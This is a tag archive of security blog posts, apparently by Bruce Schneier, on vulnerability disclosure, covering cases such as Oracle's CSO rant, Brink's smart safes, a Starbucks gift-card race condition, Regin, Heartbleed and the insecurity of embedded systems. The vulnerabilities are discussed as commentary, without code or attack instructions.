Entries Tagged "disclosure"

Page 4 of 10

Oracle CSO Rant Against Security Experts

Oracle’s CSO Mary Ann Davidson wrote a blog post ranting against security experts finding vulnerabilities in her company’s products. The blog post has been taken down by the company, but was saved for posterity by others. There’s been lots of commentary.

It’s easy to just mock Davidson’s stance, but it’s dangerous to our community. Yes, if researchers don’t find vulnerabilities in Oracle products, then the company won’t look bad and won’t have to patch things. But the real attackers—whether they be governments, criminals, or cyberweapons arms manufacturers who sell to government and criminals—will continue to find vulnerabilities in her products. And while they won’t make a press splash and embarrass her, they will exploit them.

Posted on August 17, 2015 at 6:45 AMView Comments

Vulnerabilities in Brink's Smart Safe

Brink’s sells an Internet-enabled smart safe called the CompuSafe Galileo. Despite being sold as a more secure safe, it’s wildly insecure:

Vulnerabilities found in CompuSafe Galileo safes, smart safes made by the ever-reliable Brinks company that are used by retailers, restaurants, and convenience stores, would allow a rogue employee or anyone else with physical access to them to command their doors to open and relinquish their cash….

The hack has the makings of the perfect crime, because a thief could also erase any evidence that the theft occurred simply by altering data in a back-end database where the smartsafe logs how much money is inside and who accessed it.

Nothing about these vulnerabilities is a surprise to anyone who works in computer security:

But the safes have an external USB port on the side of the touchscreens that allows service technicians to troubleshoot and obtain a backup of the database. This, unfortunately, creates an easy entrypoint for thieves to take complete, administrative control of the devices.

“Once you’re able to plug into that USB port, you’re able to access lots of things that you shouldn’t normally be able to access,” Petro told WIRED. “There is a full operating system…that you’re able to…fully take over…and make [the safe] do whatever you want it to do.”

The researchers created a malicious script that, once inserted into a safe on a USB stick, lets a thief automatically open the safe doors by emulating certain mouse and keyboard actions and bypassing standard application controls. “You plug in this little gizmo, wait about 60 seconds, and the door just pops open,” says Petro.

If it sounds like the people who designed this e-safe ignored all of the things we’ve learned about computer security in the last few decades, you’re right. And that’s the problem with Internet-of-Things security: it’s often designed by people who don’t know computer or Internet security.

They also haven’t learned the lessons of full disclosure or rapid patching:

They notified Brinks about the vulnerabilities more than a year ago, but say the company appears to have done nothing to resolve the issues. Although Brinks could disable driver software associated with the USB port to prevent someone from controlling the safes in this way, or lock down the system and database so it’s not running in administrative mode and the database can’t be changed, but so far the company appears to have done none of these.

.

Again, this all sounds familiar. The computer industry learned its lessons over a decade ago. Before then they ignored security vulnerabilities, threatened researchers, and generally behaved very badly. I expect the same things to happen with Internet-of-Things companies.

Posted on August 3, 2015 at 1:27 PMView Comments

Race Condition Exploit in Starbucks Gift Cards

A researcher was able to steal money from Starbucks by exploiting a race condition in its gift card value-transfer protocol. Basically, by initiating two identical web transfers at once, he was able to trick the system into recording them both. Normally, you could take a $5 gift card and move that money to another $5 gift card, leaving you with an empty gift card and a $10 gift card. He was able to duplicate the transfer, giving him an empty gift card and a $15 gift card.

Race-condition attacks are unreliable and it took him a bunch of tries to get it right, but there’s no reason to believe that he couldn’t have kept doing this forever.

Unfortunately, there was really no one at Starbucks he could tell this to:

The hardest part—responsible disclosure. Support guy honestly answered there’s absolutely no way to get in touch with technical department and he’s sorry I feel this way. Emailing InformationSecurityServices@starbucks.com on March 23 was futile (and it only was answered on Apr 29). After trying really hard to find anyone who cares, I managed to get this bug fixed in like 10 days.

The unpleasant part is a guy from Starbucks calling me with nothing like “thanks” but mentioning “fraud” and “malicious actions” instead. Sweet!

A little more from BBC News:

A spokeswoman for Starbucks told BBC News: “After this individual reported he was able to commit fraudulent activity against Starbucks, we put safeguards in place to prevent replication.”

The company did not answer questions about its response to Mr Homakov.

More info.

Posted on May 26, 2015 at 4:51 PMView Comments

Regin Malware

Last week, we learned about a striking piece of malware called Regin that has been infecting computer networks worldwide since 2008. It’s more sophisticated than any known criminal malware, and everyone believes a government is behind it. No country has taken credit for Regin, but there’s substantial evidence that it was built and operated by the United States.

This isn’t the first government malware discovered. GhostNet is believed to be Chinese. Red October and Turla are believed to be Russian. The Mask is probably Spanish. Stuxnet and Flame are probably from the U.S. All these were discovered in the past five years, and named by researchers who inferred their creators from clues such as who the malware targeted.

I dislike the “cyberwar” metaphor for espionage and hacking, but there is a war of sorts going on in cyberspace. Countries are using these weapons against each other. This affects all of us not just because we might be citizens of one of these countries, but because we are all potentially collateral damage. Most of the varieties of malware listed above have been used against nongovernment targets, such as national infrastructure, corporations, and NGOs. Sometimes these attacks are accidental, but often they are deliberate.

For their defense, civilian networks must rely on commercial security products and services. We largely rely on antivirus products from companies such as Symantec, Kaspersky, and F-Secure. These products continuously scan our computers, looking for malware, deleting it, and alerting us as they find it. We expect these companies to act in our interests, and never deliberately fail to protect us from a known threat.

This is why the recent disclosure of Regin is so disquieting. The first public announcement of Regin was from Symantec, on November 23. The company said that its researchers had been studying it for about a year, and announced its existence because they knew of another source that was going to announce it. That source was a news site, the Intercept, which described Regin and its U.S. connections the following day. Both Kaspersky and F-Secure soon published their own findings. Both stated that they had been tracking Regin for years. All three of the antivirus companies were able to find samples of it in their files since 2008 or 2009.

So why did these companies all keep Regin a secret for so long? And why did they leave us vulnerable for all this time?

To get an answer, we have to disentangle two things. Near as we can tell, all the companies had added signatures for Regin to their detection database long before last month. The VirusTotal website has a signature for Regin as of 2011. Both Microsoft security and F-Secure started detecting and removing it that year as well. Symantec has protected its users against Regin since 2013, although it certainly added the VirusTotal signature in 2011.

Entirely separately and seemingly independently, all of these companies decided not to publicly discuss Regin’s existence until after Symantec and the Intercept did so. Reasons given vary. Mikko Hyponnen of F-Secure said that specific customers asked him not to discuss the malware that had been found on their networks. Fox IT, which was hired to remove Regin from the Belgian phone company Belgacom’s website, didn’t say anything about what it discovered because it “didn’t want to interfere with NSA/GCHQ operations.”

My guess is that none of the companies wanted to go public with an incomplete picture. Unlike criminal malware, government-grade malware can be hard to figure out. It’s much more elusive and complicated. It is constantly updated. Regin is made up of multiple modules—Fox IT called it “a full framework of a lot of species of malware”—making it even harder to figure out what’s going on. Regin has also been used sparingly, against only a select few targets, making it hard to get samples. When you make a press splash by identifying a piece of malware, you want to have the whole story. Apparently, no one felt they had that with Regin.

That is not a good enough excuse, though. As nation-state malware becomes more common, we will often lack the whole story. And as long as countries are battling it out in cyberspace, some of us will be targets and the rest of us might be unlucky enough to be sitting in the blast radius. Military-grade malware will continue to be elusive.

Right now, antivirus companies are probably sitting on incomplete stories about a dozen more varieties of government-grade malware. But they shouldn’t. We want, and need, our antivirus companies to tell us everything they can about these threats as soon as they know them, and not wait until the release of a political story makes it impossible for them to remain silent.

This essay previously appeared in the MIT Technology Review.

Posted on December 8, 2014 at 7:19 AMView Comments

FOXACID Operations Manual

A few days ago, I saw this tweet: “Just a reminder that it is now *a full year* since Schneier cited it, and the FOXACID ops manual remains unpublished.” It’s true.

The citation is this:

According to a top-secret operational procedures manual provided by Edward Snowden, an exploit named Validator might be the default, but the NSA has a variety of options. The documentation mentions United Rake, Peddle Cheap, Packet Wrench, and Beach Head-­all delivered from a FOXACID subsystem called Ferret Cannon.

Back when I broke the QUANTUM and FOXACID programs, I talked with the Guardian editors about publishing the manual. In the end, we decided not to, because the information in it wasn’t useful to understanding the story. It’s been a year since I’ve seen it, but I remember it being just what I called it: an operation procedures manual. It talked about what to type into which screens, and how to deal with error conditions. It didn’t talk about capabilities, either technical or operational. I found it interesting, but it was hard to argue that it was necessary in order to understand the story.

It will probably never be published. I lost access to the Snowden documents soon after writing that essay—Greenwald broke with the Guardian, and I have never been invited back by the Intercept—and there’s no one looking at the documents with an eye to writing about the NSA’s technical capabilities and how to securely design systems to protect against government surveillance. Even though we now know that the same capabilities are being used by other governments and cyber criminals, there’s much more interest in stories with political ramifications.

Posted on October 15, 2014 at 6:29 AMView Comments

The Human Side of Heartbleed

The announcement on April 7 was alarming. A new Internet vulnerability called Heartbleed could allow hackers to steal your logins and passwords. It affected a piece of security software that is used on half a million websites worldwide. Fixing it would be hard: It would strain our security infrastructure and the patience of users everywhere.

It was a software insecurity, but the problem was entirely human.

Software has vulnerabilities because it’s written by people, and people make mistakes—thousands of mistakes. This particular mistake was made in 2011 by a German graduate student who was one of the unpaid volunteers working on a piece of software called OpenSSL. The update was approved by a British consultant.

In retrospect, the mistake should have been obvious, and it’s amazing that no one caught it. But even though thousands of large companies around the world used this critical piece of software for free, no one took the time to review the code after its release.

The mistake was discovered around March 21, 2014, and was reported on April 1 by Neel Mehta of Google’s security team, who quickly realized how potentially devastating it was. Two days later, in an odd coincidence, researchers at a security company called Codenomicon independently discovered it.

When a researcher discovers a major vulnerability in a widely used piece of software, he generally discloses it responsibly. Why? As soon as a vulnerability becomes public, criminals will start using it to hack systems, steal identities, and generally create mayhem, so we have to work together to fix the vulnerability quickly after it’s announced.

The researchers alerted some of the larger companies quietly so that they could fix their systems before the public announcement. (Who to tell early is another very human problem: If you tell too few, you’re not really helping, but if you tell too many, the secret could get out.) Then Codenomicon announced the vulnerability.

One of the biggest problems we face in the security community is how to communicate these sorts of vulnerabilities. The story is technical, and people often don’t know how to react to the risk. In this case, the Codenomicon researchers did well. They created a public website explaining (in simple terms) the vulnerability and how to fix it, and they created a logo—a red bleeding heart—that every news outlet used for coverage of the story.

The first week of coverage varied widely, as some people panicked and others downplayed the threat. This wasn’t surprising: There was a lot of uncertainty about the risk, and it wasn’t immediately obvious how disastrous the vulnerability actually was.

The major Internet companies were quick to patch vulnerable systems. Individuals were less likely to update their passwords, but by and large, that was OK.

True to form, hackers started exploiting the vulnerability within minutes of the announcement. We assume that governments also exploited the vulnerability while they could. I’m sure the U.S. National Security Agency had advance warning.

By now, it’s largely over. There are still lots of unpatched systems out there. (Many of them are embedded hardware systems that can’t be patched.) The risk of attack is still there, but minimal. In the end, the actual damage was also minimal, although the expense of restoring security was great.

The question that remains is this: What should we expect in the future—are there more Heartbleeds out there?

Yes. Yes there are. The software we use contains thousands of mistakes—many of them security vulnerabilities. Lots of people are looking for these vulnerabilities: Researchers are looking for them. Criminals and hackers are looking for them. National intelligence agencies in the United States, the United Kingdom, China, Russia, and elsewhere are looking for them. The software vendors themselves are looking for them.

What happens when a vulnerability is found depends on who finds it. If the vendor finds it, it quietly fixes it. If a researcher finds it, he or she alerts the vendor and then reports it to the public. If a national intelligence agency finds the vulnerability, it either quietly uses it to spy on others or—if we’re lucky—alerts the vendor. If criminals and hackers find it, they use it until a security company notices and alerts the vendor, and then it gets fixed—usually within a month.

Heartbleed was unique because there was no single fix. The software had to be updated, and then websites had to regenerate their encryption keys and get new public-key certificates. After that, people had to update their passwords. This multi-stage process had to take place publicly, which is why the announcement happened the way it did.

Yes, it’ll happen again. But most of the time, it’ll be easier to deal with than this.

This essay previously appeared on The Mark News.

Posted on June 4, 2014 at 6:23 AMView Comments

The Insecurity of Secret IT Systems

We now know a lot about the security of the Rapiscan 522 B x-ray system used to scan carry-on baggage in airports worldwide. Billy Rios, director of threat intelligence at Qualys, got himself one and analyzed it. And he presented his results at the Kaspersky Security Analyst Summit this week.

It’s worse than you might have expected:

It runs on the outdated Windows 98 operating system, stores user credentials in plain text, and includes a feature called Threat Image Projection used to train screeners by injecting .bmp images of contraband, such as a gun or knife, into a passenger carry-on in order to test the screener’s reaction during training sessions. The weak logins could allow a bad guy to project phony images on the X-ray display.

While this is all surprising, it shouldn’t be. These are the same sort of problems we saw in proprietary electronic voting machines, or computerized medical equipment, or computers in automobiles. Basically, whenever an IT system is designed and used in secret – either actual secret or simply away from public scrutiny – the results are pretty awful.

I used to decry secret security systems as “security by obscurity.” I now say it more strongly: “obscurity means insecurity.”

Security is a process. For software, that process is iterative. It involves defenders trying to build a secure system, attackers—criminals, hackers, and researchers—defeating the security, and defenders improving their system. This is how all mass-market software improves its security. It’s the best system we have. And for systems that are kept out of the hands of the public, that process stalls. The result looks like the Rapiscan 522 B x-ray system.

Smart security engineers open their systems to public scrutiny, because that’s how they improve. The truly awful engineers will not only hide their bad designs behind secrecy, but try to belittle any negative security results. Get ready for Rapiscan to claim that the researchers had old software, and the new software has fixed all these problems. Or that they’re only theoretical. Or that the researchers themselves are the problem. We’ve seen it all before.

Posted on February 14, 2014 at 6:50 AMView Comments

Security Risks of Embedded Systems

We’re at a crisis point now with regard to the security of embedded systems, where computing is embedded into the hardware itself—as with the Internet of Things. These embedded computers are riddled with vulnerabilities, and there’s no good way to patch them.

It’s not unlike what happened in the mid-1990s, when the insecurity of personal computers was reaching crisis levels. Software and operating systems were riddled with security vulnerabilities, and there was no good way to patch them. Companies were trying to keep vulnerabilities secret, and not releasing security updates quickly. And when updates were released, it was hard—if not impossible—to get users to install them. This has changed over the past twenty years, due to a combination of full disclosure—publishing vulnerabilities to force companies to issue patches quicker—and automatic updates: automating the process of installing updates on users’ computers. The results aren’t perfect, but they’re much better than ever before.

But this time the problem is much worse, because the world is different: All of these devices are connected to the Internet. The computers in our routers and modems are much more powerful than the PCs of the mid-1990s, and the Internet of Things will put computers into all sorts of consumer devices. The industries producing these devices are even less capable of fixing the problem than the PC and software industries were.

If we don’t solve this soon, we’re in for a security disaster as hackers figure out that it’s easier to hack routers than computers. At a recent Def Con, a researcher looked at thirty home routers and broke into half of them—including some of the most popular and common brands.

To understand the problem, you need to understand the embedded systems market.

Typically, these systems are powered by specialized computer chips made by companies such as Broadcom, Qualcomm, and Marvell. These chips are cheap, and the profit margins slim. Aside from price, the way the manufacturers differentiate themselves from each other is by features and bandwidth. They typically put a version of the Linux operating system onto the chips, as well as a bunch of other open-source and proprietary components and drivers. They do as little engineering as possible before shipping, and there’s little incentive to update their “board support package” until absolutely necessary.

The system manufacturers—usually original device manufacturers (ODMs) who often don’t get their brand name on the finished product—choose a chip based on price and features, and then build a router, server, or whatever. They don’t do a lot of engineering, either. The brand-name company on the box may add a user interface and maybe some new features, make sure everything works, and they’re done, too.

The problem with this process is that no one entity has any incentive, expertise, or even ability to patch the software once it’s shipped. The chip manufacturer is busy shipping the next version of the chip, and the ODM is busy upgrading its product to work with this next chip. Maintaining the older chips and products just isn’t a priority.

And the software is old, even when the device is new. For example, one survey of common home routers found that the software components were four to five years older than the device. The minimum age of the Linux operating system was four years. The minimum age of the Samba file system software: six years. They may have had all the security patches applied, but most likely not. No one has that job. Some of the components are so old that they’re no longer being patched. This patching is especially important because security vulnerabilities are found “more easily” as systems age.

To make matters worse, it’s often impossible to patch the software or upgrade the components to the latest version. Often, the complete source code isn’t available. Yes, they’ll have the source code to Linux and any other open-source components. But many of the device drivers and other components are just “binary blobs”—no source code at all. That’s the most pernicious part of the problem: No one can possibly patch code that’s just binary.

Even when a patch is possible, it’s rarely applied. Users usually have to manually download and install relevant patches. But since users never get alerted about security updates, and don’t have the expertise to manually administer these devices, it doesn’t happen. Sometimes the ISPs have the ability to remotely patch routers and modems, but this is also rare.

The result is hundreds of millions of devices that have been sitting on the Internet, unpatched and insecure, for the last five to ten years.

Hackers are starting to notice. Malware DNS Changer attacks home routers as well as computers. In Brazil, 4.5 million DSL routers were compromised for purposes of financial fraud. Last month, Symantec reported on a Linux worm that targets routers, cameras, and other embedded devices.

This is only the beginning. All it will take is some easy-to-use hacker tools for the script kiddies to get into the game.

And the Internet of Things will only make this problem worse, as the Internet—as well as our homes and bodies—becomes flooded with new embedded devices that will be equally poorly maintained and unpatchable. But routers and modems pose a particular problem, because they’re: (1) between users and the Internet, so turning them off is increasingly not an option; (2) more powerful and more general in function than other embedded devices; (3) the one 24/7 computing device in the house, and are a natural place for lots of new features.

We were here before with personal computers, and we fixed the problem. But disclosing vulnerabilities in an effort to force vendors to fix the problem won’t work the same way as with embedded systems. The last time, the problem was computers, ones mostly not connected to the Internet, and slow-spreading viruses. The scale is different today: more devices, more vulnerability, viruses spreading faster on the Internet, and less technical expertise on both the vendor and the user sides. Plus vulnerabilities that are impossible to patch.

Combine full function with lack of updates, add in a pernicious market dynamic that has inhibited updates and prevented anyone else from updating, and we have an incipient disaster in front of us. It’s just a matter of when.

We simply have to fix this. We have to put pressure on embedded system vendors to design their systems better. We need open-source driver software—no more binary blobs!—so third-party vendors and ISPs can provide security tools and software updates for as long as the device is in use. We need automatic update mechanisms to ensure they get installed.

The economic incentives point to large ISPs as the driver for change. Whether they’re to blame or not, the ISPs are the ones who get the service calls for crashes. They often have to send users new hardware because it’s the only way to update a router or modem, and that can easily cost a year’s worth of profit from that customer. This problem is only going to get worse, and more expensive. Paying the cost up front for better embedded systems is much cheaper than paying the costs of the resultant security disasters.

This essay originally appeared on Wired.com.

Posted on January 9, 2014 at 6:33 AMView Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.